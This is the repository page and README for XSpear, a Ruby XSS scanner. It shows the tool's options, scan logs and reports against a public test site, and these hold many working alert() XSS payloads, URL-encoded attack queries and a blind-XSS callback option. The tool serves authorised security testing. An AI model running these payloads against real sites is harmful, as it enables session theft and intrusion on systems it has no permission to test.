• Stars
    star
    1,157
  • Rank 40,327 (Top 0.8 %)
  • Language
    Ruby
  • License
    MIT License
  • Created over 5 years ago
  • Updated about 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

🔱 Powerfull XSS Scanning and Parameter analysis tool&gem

XSpear

XSpear is XSS Scanner on ruby gems

TOC

Key features

  • Pattern matching based XSS scanning
  • Detect alert confirm prompt event on headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected(or all) params
    • Reflected Params
    • All params(for blind xss, anytings)
    • Filtered test event handler HTML tag Special Char Useful code
    • Testing custom payload for only you!
  • Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
  • Dynamic/Static Analysis
    • Find SQL Error pattern
    • Analysis Security headers(CSP HSTS X-frame-options, XSS-protection etc.. )
    • Analysis Other headers..(Server version, Content-Type, etc...)
    • XSS Testing to URI Path
    • Testing Only Parameter Analysis (aka no-XSS mode)
  • Scanning from Raw file(Burp suite, ZAP Request)
  • XSpear running on ruby code(with Gem library)
  • Show table base cli-report and filtered rule, testing raw query(url)
  • Testing at selected parameters
  • Support output format cli json html
    • cli
    • json
    • html
  • Support Verbose level (0~3)
    • 0: quite mode(only result)
    • 1: show scanning status(default)
    • 2: show scanning logs
    • 3: show detail log(req/res)
  • Support custom callback code to any test various attack vectors
  • Support Config file

Installation

Install it yourself as:

$ gem install XSpear

Or install it yourself as (local file / download latest ):

$ gem install XSpear-{version}.gem

Add this line to your application's Gemfile:

gem 'XSpear'

And then execute:

$ bundle

Dependency gems

colorize selenium-webdriver terminal-table progress_bar
If you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.

$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

Usage on cli

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
    -a, --test-all-params            [optional] test to all params(include not reflected)
        --no-xss                     [optional] no testing xss, only parameters analysis
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --custom-payload=FILENAME    [optional] Load custom payload json file
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FORMAT              [optional] Output format (cli , json)
    -c, --config=FILENAME            [optional] Using config.json
    -v, --verbose=0~3                [optional] Show log depth
                                      + v=0 : quite mode(only result)
                                      + v=1 : show scanning status(default)
                                      + v=2 : show scanning logs
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update


Result types

  • (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
  • (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
  • (L)OW: Low level issue
  • (M)EDIUM: medium level issue
  • (H)IGH: high level issue

Verbose Mode

[0] quite mode(show only result)

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
you see report

[1] show progress bar (default)

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [  3.83/s]
...
you see report

[2] show scanning logs

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
you see report

[3] show scanning detail logs

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
[*] analysis request..
[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[-] [22:56:21] [200/OK] 'STATIC' not reflected
[-] [22:56:21] [200/OK] cat=123rEfe6 in url
...
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
...
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
...
you see report

Case by Case

Scanning XSS

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

Only JSON output

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0

Set scanning thread

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

Testing at selected parameters

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

Testing at all parameters
(This option is tested with or without reflection.)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a

Testing Only parameter analysis (aka no-xss mode)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss

Testing blind xss(all params)
(Should be used as much as possible because Blind XSS is everywhere)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

# Set your blind xss host. <-b options>

Testing custom payload

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json 

in custom_payload.json file

[
  {
    "payload":"<svg/onload=alert(1)>",
    "callback":"P1",
    "descript":"blahblah~"
  },
  {
    "payload":"<svg/onload=alert(1)>",
    "callback":"P2",
    "descript":"blahblah~"
  },
  {
    "payload":"<>",
    "callback":"P1",
    "descript":"blahblah~"
  }
]

for Pipeline

$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

# -u : target 
# -b : testing blind xss
# -a : test all params(test to not reflected param)
# -v : verbose, not showing logs at value 1.
# -o : output optios, json!

result json data

{
    "starttime": "2019-12-25 00:02:58 +0900",
    "endtime": "2019-12-25 00:03:31 +0900",
    "issue_count": 25,
    "issue_list": [{
        "id": 0,
        "type": "INFO",
        "issue": "DYNAMIC ANALYSIS",
        "method": "GET",
        "param": "cat",
        "payload": "XsPeaR\"",
        "description": "Found SQL Error Pattern"
    }, {
        "id": 1,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Found Server: nginx/1.4.1"
    }, {
        "id": 2,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not set HSTS"
    }, {
        "id": 3,
        "type": "INFO",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Content-Type: text/html"
    }, {
        "id": 4,
        "type": "LOW",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set X-Frame-Options"
    }, {
        "id": 5,
        "type": "MIDUM",
        "issue": "STATIC ANALYSIS",
        "method": "GET",
        "param": "-",
        "payload": "<original query>",
        "description": "Not Set CSP"
    }, {
        "id": 6,
        "type": "INFO",
        "issue": "REFLECTED",
        "method": "GET",
        "param": "cat",
        "payload": "rEfe6",
        "description": "reflected parameter"
    }, {
        "id": 7,
        "type": "INFO",
        "issue": "FILERD RULE",
        "method": "GET",
        "param": "cat",
        "payload": "onhwul=64",
        "description": "not filtered event handler on{any} pattern"
    }
....
, {
        "id": 17,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<audio src onloadstart=alert(45)>",
        "description": "reflected HTML5 XSS Code"
    }, {
        "id": 18,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<keygen autofocus onfocus=alert(45)>",
        "description": "reflected onfocus XSS Code"
 ....
    }, {
        "id": 24,
        "type": "HIGH",
        "issue": "XSS",
        "method": "GET",
        "param": "cat",
        "payload": "<marquee onstart=alert(45)>",
        "description": "triggered <marquee onstart=alert(45)>"
    }]
}

(Items marked as triggered are actually payloads that work in the browser.)

XSpear on Burpsuite
https://github.com/hahwul/XSpear/tree/master/forBurp

etc...

Sample log

Scanning XSS

xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
 >  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.4.0 ]
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 1 param ]
[*] test query generation is complete. [251 query]
[*] starting XSS Scanning. [10 threads]
...snip...
[*] finish scan. the report is being generated..
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
|                                                            [ XSpear report ]                                                            |
|                              http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip)                              |
|                                 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues.                                  |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                                | DESCRIPTION                                   |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
| 0  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Found Server: nginx/1.4.1                     |
| 1  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not set HSTS                                  |
| 2  | INFO  | STATIC ANALYSIS  | GET    | -     | <original query>                       | Content-Type: text/html                       |
| 3  | LOW   | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set X-Frame-Options                       |
| 4  | MIDUM | STATIC ANALYSIS  | GET    | -     | <original query>                       | Not Set CSP                                   |
| 5  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR"                                | Found SQL Error Pattern                       |
| 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                                  | reflected parameter                           |
| 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                              | not filtered event handler on{any} pattern    |
| 8  | HIGH  | XSS              | GET    | cat   | <script>alert(45)</script>             | reflected XSS Code                            |
| 9  | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | reflected HTML5 XSS Code                      |
| 10 | HIGH  | XSS              | GET    | cat   | <details/open/ontoggle="alert`45`">    | reflected HTML5 XSS Code                      |
| 11 | HIGH  | XSS              | GET    | cat   | <select autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 12 | HIGH  | XSS              | GET    | cat   | <input autofocus onfocus=alert(45)>    | reflected onfocus XSS Code                    |
| 13 | HIGH  | XSS              | GET    | cat   | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code                    |
| 14 | HIGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | reflected HTML5 XSS Code                      |
| 15 | HIGH  | XSS              | GET    | cat   | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code                      |
| 16 | HIGH  | XSS              | GET    | cat   | "><iframe/src=JavaScriPt:alert(45)>    | reflected XSS Code                            |
| 17 | HIGH  | XSS              | GET    | cat   | <video/poster/onerror=alert(45)>       | reflected HTML5 XSS Code                      |
| 18 | HIGH  | XSS              | GET    | cat   | <keygen autofocus onfocus=alert(45)>   | reflected onfocus XSS Code                    |
| 19 | VULN  | XSS              | GET    | cat   | <script>alert(45)</script>             | triggered <script>alert(45)</script>          |
| 20 | HIGH  | XSS              | GET    | cat   | <marquee onstart=alert(45)>            | triggered <marquee onstart=alert(45)>         |
| 21 | HIGH  | XSS              | GET    | cat   | <details/open/ontoggle="alert(45)">    | triggered <details/open/ontoggle="alert(45)"> |
| 22 | HIGH  | XSS              | GET    | cat   | <audio src onloadstart=alert(45)>      | triggered <audio src onloadstart=alert(45)>   |
| 23 | VULN  | XSS              | GET    | cat   | '"><svg/onload=alert(45)>              | triggered <svg/onload=alert(45)>              |
+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
< Available Objects >
[cat] param
 + Available Special Char: ` ( \ ' { ) } [ : $ ]
 + Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
 + Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
 + Available Useful Code: "document.cookie","document.location","window.location"

< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?-
..snip..
[19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
[20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
[21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
[22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff
[23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff

...snip...

to JSON

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
{"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}

Usage on ruby code

require 'XSPear'

# Set options
options = {}
options['thread'] = 30
options['cookie'] = "data=123"
options['blind'] = "https://hahwul.xss.ht"
options['output'] = json

# Create XSpear object with url, options
s = XspearScan.new "https://www.hahwul.com?target_url", options

# Scanning
s.run
result = s.report.to_json
r = JSON.parse result

Add Scanning Module

1) Add makeQueryPattern

makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion")
# type: f(ilterd?) r(eflected?) x(ss?)
# category i(nfo) v(uln) l(ow) m(edium) h(igh) 

# e.g 
# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)

2) if other callback, write callback class override ScanCallbackFunc e.g

  class CallbackStringMatch < ScanCallbackFunc
    def run
      if @response.body.include? @query
        [true, "reflected #{@query}"]
      else
        [false, "not reflected #{@query}"]
      end
    end
  end

Parent class(ScanCallbackFunc)

class ScanCallbackFunc()
    def initialize(url, method, query, response)
      @url = url
      @method = method
      @query = query
      @response = response
      # self.run
    end
    
    def run
      # override
    end
end

Common Callback Class

  • CallbackXSSSelenium
  • CallbackErrorPatternMatch
  • CallbackCheckHeaders
  • CallbackStringMatch
  • CallbackNotAdded
  • etc...

Update

if nomal user

$ gem update XSpear

if developers (soft)

$ git pull -v

if develpers (hard)

$ git reset --hard HEAD; git pull -v

RubyDoc

https://www.rubydoc.info/gems/XSpear/

Development

After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.

To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb, and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.

Contributing

Bug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.

Donate

I like coffee! I'm a coffee addict.
Buy Me A Coffee

License

The gem is available as open source under the terms of the MIT License.

Code of Conduct

Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.

ScreenShot

< Scanning Image> < CLI-Report 1 > < CLI-Report 2 > < JSON Report > < HTML Report >

Video

asciicast

More Repositories

1

WebHackersWeapons

⚔️ Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting
Ruby
3,764
star
2

dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
Go
3,504
star
3

DevSecOps

♾️ Collection and Roadmap for everyone who wants DevSecOps. Hope your DevOps are more safe 😎
Go
1,716
star
4

jwt-hack

🔩 jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)
Go
748
star
5

MobileHackersWeapons

Mobile Hacker's Weapons / A collection of cool tools used by Mobile hackers. Happy hacking , Happy bug-hunting
Go
682
star
6

a2sv

Auto Scanning to SSL Vulnerability
Python
617
star
7

authz0

🔑 Authz0 is an automated authorization test tool. Unauthorized access can be identified based on URLs and Roles & Credentials.
Go
386
star
8

mad-metasploit

Metasploit custom modules, plugins, resource script and.. awesome metasploit collection
Ruby
382
star
9

droid-hunter

(deprecated) Android application vulnerability analysis and Android pentest tool
Ruby
288
star
10

metasploit-autopwn

db_autopwn plugin of metasploit
Ruby
199
star
11

deadfinder

🏴‍☠️ Find dead-links (broken links)
Ruby
127
star
12

RegexPassive

🔭 Collection of regexp pattern for security passive scanning
112
star
13

mzap

⚡️ Multiple target ZAP Scanning
Go
101
star
14

XSS-Payload-without-Anything

XSS Payload without Anything.
100
star
15

hack-pet

🐰 Managing command snippets for hackers/bug bounty hunters. with pet.
Go
99
star
16

s3reverse

The format of various s3 buckets is convert in one format. for bugbounty and security testing.
Go
80
star
17

gee

🏵 Gee is tool of stdin to each files and stdout. It is similar to the tee command, but there are more functions for convenience. In addition, it was written as go
Go
80
star
18

websocket-connection-smuggler

websocket-connection-smuggler
Go
67
star
19

gitls

🖇 Enumerate git repository URL from list of URL / User / Org. Friendly to pipeline
Go
58
star
20

ws-smuggler

WebSocket Connection Smuggler
Go
47
star
21

ras-fuzzer

RAS(RAndom Subdomain) Fuzzer
Go
43
star
22

MemBi

All the members of bugbounty and infosec. If you don't know who to follow, see!
Go
35
star
23

backbomb

💣 Dockerized penetration-testing/bugbounty/app-sec testing environment
Go
33
star
24

hbxss

Security test tool for Blind XSS
Ruby
27
star
25

fuzzstone

My fuzz repo!
JavaScript
23
star
26

action-dalfox

XSS scanning with Dalfox on Github-action
Dockerfile
23
star
27

recon-raven

Reconnaissance tool of Penetration test & Bug Bounty
Ruby
23
star
28

xssmaze

XSSMaze is a web service designed to test and improve the performance of security testing tools by providing various cases of XSS vulnerabilities.
Crystal
21
star
29

noir

♠️ Noir is an attack surface detector form source code.
Crystal
20
star
30

assets.hahwul.com

assets for www.hahwul.com
Shell
20
star
31

vais

SWF Vulnerability & Information Scanner
HTML
20
star
32

can-i-protect-xss

Everything about xss protection technology
15
star
33

volt

⚡ Golang library for quick make pentest tools
Go
15
star
34

raven

Automation Hacking & Penetration Testing Suite
Ruby
13
star
35

vunlink

Auto Web Vulnerability Scanning Framework
Ruby
11
star
36

hahwul

about me!
10
star
37

websocket-connection-smuggling-go

websocket-connection-smuggling write in go
Go
10
star
38

zest-env

🐋 Zest CLI Environment
Shell
10
star
39

github-aciton-injection-test

This repo is a sample repo for Github Action Injection.
9
star
40

awesome-zap-extensions

A curated list of amazingly awesome ZAP Extensions
8
star
41

VAHA

Web for security engineer & hacker
7
star
42

jqueen

Go
6
star
43

buildpack-nmap

install nmap and set alias buildpack of heroku
Shell
6
star
44

m2h.js

remote markdown document to html on DOM
JavaScript
6
star
45

homebrew-dalfox

Ruby
5
star
46

zap-cloud-scan

5
star
47

hahwul-testzz

tool, page code for https://www.hahwul.com
HTML
5
star
48

qs-openvpn

quick setup openvpn
Shell
5
star
49

eoyc

Encoding Only Your Choices
Crystal
5
star
50

zaproxy-ruby

A Ruby Implementation and Library for Easy Utilization of ZAP API
Ruby
5
star
51

cyan-snake

Live OS for Physical hacking
Ruby
5
star
52

podopunch

Easy testing from multiple android devices
Python
5
star
53

openvas_install_script

OpenVAS Scanner Install Script on Debian
Shell
5
star
54

rings

Ruby
4
star
55

homebrew-jwt-hack

Ruby
4
star
56

buildpack-zap-daemon

zap(zed attack proxy) daemon mode buildpack of heroku
Shell
4
star
57

CaidoTweaks

4
star
58

restime

Web page response time checker
Python
4
star
59

exploit-db_to_dokuwiki

exploit-db(edb) convert to dokuwiki template
Python
4
star
60

homebrew-backbomb

backbomb homebrew repository
Ruby
4
star
61

booungJS

Vulnerability analysis to javascript using javascript and web debugger
JavaScript
4
star
62

homebrew-authz0

Ruby
3
star
63

licaner

Go
3
star
64

ftc

simple copy to file to clipboard
Ruby
3
star
65

struts2-rce-cve-2017-9805-ruby

cve -2017-9805
Ruby
3
star
66

homebrew-mzap

Ruby
3
star
67

go-github-selfupdate-patched

go get error patched version
Go
3
star
68

crystal-smuggle

Toy :D
Crystal
3
star
69

jekyll-securitytxt

Jekyll plugin for security.txt
Ruby
3
star
70

shooting-scheme

custom scheme testing tool with checklist
3
star
71

action-authz0-test

3
star
72

mycert

Ruby
2
star
73

lab

lab.hahwul.com
2
star
74

homebrew-gee

Ruby
2
star
75

homebrew-s3reverse

Ruby
2
star
76

caido-crystal

Caido implementation for crystal
Crystal
2
star
77

heroku-buildpack-geckodriver

2
star
78

dawn-of-seoul

It is a Caido theme made to feel blue, the representative dawn color of Seoul.
2
star
79

vuln_test

<video><embed><object><meta><body><script><frame><frameset>
2
star
80

projectsend_r582_webshell

ProjectSend_r582_webshell exploit
Ruby
1
star
81

homebrew-eoyc

Ruby
1
star
82

bad-usb-scripts

1
star
83

purl.cr

Crystal
1
star
84

hlogger

golang logger for hahwul z
Go
1
star